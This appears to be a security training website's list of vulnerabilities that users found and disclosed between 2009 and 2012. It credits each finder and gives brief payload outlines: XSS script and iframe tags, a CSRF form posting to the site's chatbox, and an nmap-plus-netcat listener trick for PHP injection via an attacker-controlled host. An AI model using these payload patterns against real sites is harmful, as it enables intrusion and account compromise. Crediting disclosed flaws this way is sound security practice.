As on any information system, some weaknesses were identified on the website.

- [02/12/2009] real found a code injection vulnerability :


- [02/02/2011] hello found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

- [15/02/2011] essandre found a LFI :


- [30/06/2011] elyfean found a CSRF on the chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">

- [11/07/2011] Armel found a stored XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

- [18/07/2011] g0uZ found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

- [02/10/2011] Hypnoze57 found a insecure indirect object references which lead to unauthorized access to all PM :


- [23/10/2011] courte66 found a reflected XSS in the "encode - decode" page :

Text to decode in base64


- [20/03/2012] jimee found a LFI in the realistic challenge 9 :


- [06/11/2012] crown found several stored XSS in the user profile management :

<script>[code javascript/vbscript]</script>